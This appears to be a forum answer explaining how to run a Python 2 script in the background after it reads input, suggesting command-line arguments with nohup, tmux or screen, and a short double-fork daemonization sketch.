I think your program shouldn't read its input from stdin; instead, give it the data via its command line.
So instead of
startdata = raw_input('enter_input:')
you do
import sys
startdata = sys.argv[1]
and you start your program with
$ nohup python myprogram.py SOMETHING &
and all works the way you want - if I get you right.
You could make your process fork to the background after reading the input. The by far easier variant, though, is to start your process inside tmux or GNU screen.
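For completeness, a minimal sketch of the fork-to-background variant (Unix only; the classic double fork, with raw_input as in the question):

import os
import sys

startdata = raw_input('enter_input: ')  # interact while still attached to the terminal

# Classic Unix double fork: detach from the terminal, roughly what nohup + & gives you
if os.fork() > 0:
    sys.exit(0)   # parent returns control to the shell
os.setsid()       # become session leader, drop the controlling tty
if os.fork() > 0:
    sys.exit(0)   # first child exits; the grandchild can never reacquire a tty

# Point stdio at /dev/null so a closed terminal cannot hurt us
devnull = os.open(os.devnull, os.O_RDWR)
for fd in (0, 1, 2):
    os.dup2(devnull, fd)

# ... the long-running processing of startdata continues here ...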
